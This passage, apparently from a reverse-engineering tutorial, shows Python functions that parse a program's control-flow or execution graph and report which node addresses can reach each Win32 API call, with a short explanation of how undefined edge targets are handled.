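def api_nodes(nodes):
    """id -> list of Win32 API names attached to that node's label."""
    out = {}
    for nid, node in nodes.items():
        apis = [t for t in node["label"] if t[:1].isupper() and t != "API"]
        if apis:
            out[nid] = apis
    return out


def nodes_reaching(nodes, edges, api):
    """Ids of every node from which a node labelled `api` is reachable
    (the labelled node included), found by walking edges backwards."""
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    seen = {nid for nid, apis in api_nodes(nodes).items() if api in apis}
    queue = deque(seen)
    while queue:
        cur = queue.popleft()
        for p in preds[cur]:
            if p not in seen:
                seen.add(p)
                queue.append(p)
    return sorted(seen, key=int)


def addresses(nodes, ids):
    """Map node ids to addresses, skipping ids the excerpt never defined."""
    return [nodes[i]["addr"] for i in ids if i in nodes]


if __name__ == "__main__":
    for text in (CFG_TEXT, EXEC_TEXT):
        nodes, edges = parse_graph(text)
        for api in sorted({a for v in api_nodes(nodes).values() for a in v}):
            ids = nodes_reaching(nodes, edges, api)
            print(f"{api}: reachable from {addresses(nodes, ids)}")
```

Edges to ids that the excerpt never defines (10031->10013 above) are kept as edges but yield no address, which is what you want when pasting a partial graph; on the full execution_graph line the same walk shows that the entry node cf0848 reaches the MessageBoxW call through the DuplicateHandle wrappers.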